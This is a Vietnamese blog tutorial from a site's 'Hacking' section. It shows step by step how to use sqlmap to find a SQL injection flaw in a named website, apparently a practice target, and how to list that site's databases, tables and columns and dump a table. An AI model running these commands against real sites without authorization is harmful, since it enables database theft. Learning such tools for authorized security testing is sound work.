Home / Thủ Thuật / Hacking / Web6: SQL injection – Một số tool khai thác

Web6: SQL injection – Một số tool khai thác

Một số tool khai thác

Hiện nay có rất nhiều công cụ quét lỗ hổng bảo mật (bao gồm SQL injection). Những công cụ này cho phép phát hiện vào khai thác lỗ hổng SQL injection khá mạnh mẽ. Một số công cụ khai thác lỗ hổng SQL injection tự động hay được sử dụng như:

Dưới đây tôi sẽ demo việc sử dụng Sqlmap để khai thác SQL injection cơ bản.
Bạn download Sqlmap tại http://sqlmap.org/
Sqlmap được viết bằng ngôn ngữ Python, vì vậy để sử dụng tool này bạn cần cài đặt Python. Bạn có thể download python tại http://www.python.org/downloads/
Đầu tiên bạn phải xác định được website mục tiêu, ở đây tôi có mục tiêu sau:
http://zerocoolhf.altervista.org/level1.php?id=1

Bước 1: Mở cmd và gõ lệnh như sau:

Mã:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”

sqlmap sẽ phát hiện lỗ hổng của mục tiêu vào đưa ra thông tin về lỗ hổng.

Click image for larger version. 

Name:	image1.JPG 
Views:	117 
Size:	88.7 KB 
ID:	1057

Bước 2: Khi đã xác định được là website mục tiêu tồn tại lỗ hổng SQL injection, ta tiến hành tìm tên cơ sở dữ liệu.

Mã:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs
Click image for larger version. 

Name:	image2.JPG 
Views:	116 
Size:	108.6 KB 
ID:	1058

=>Cơ sở dữ liệu: my_zerocoolhf

Bước 3: Sau khi xác định được tên cơ sở dữ liệu, ta sẽ tìm tiếp tên các bảng có trong cơ sở dữ liệu.

Mã:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf
Click image for larger version. 

Name:	image3.JPG 
Views:	116 
Size:	109.3 KB 
ID:	1059

=> Có 2 bảng trong cơ sở dữ liệu: auth và book

Bước 4: Xác định tên các cột trong bảng

Mã:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book
Click image for larger version. 

Name:	image4.JPG 
Views:	116 
Size:	120.7 KB 
ID:	1060

=> Xác định được các cột trong bảng book: author, id, price, title.

Bước 5:
Dump dữ liệu từ bảng.

Mã:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book
Click image for larger version. 

Name:	image5.JPG 
Views:	116 
Size:	164.6 KB 
ID:	1061

=> Như vậy ta đã lấy được cơ sở dữ liệu của website mục tiêu.

Trên đây là demo cơ bản về sử dụng sqlmap để khai thác lỗi SQL injection, các bạn có thể tìm hiểu thêm các tùy chọn của sqlmap tại https://github.com/sqlmapproject/sqlmap/wiki/Usage để hỗ trợ việc khai thác SQL injection.

About dongpolice

Check Also

How to build App Portable-dongpolice.com

How to Build App Portable with ThinApp of VM

How to Build App Portable with ThinApp of VM – Hướng dẫn làm App Portable …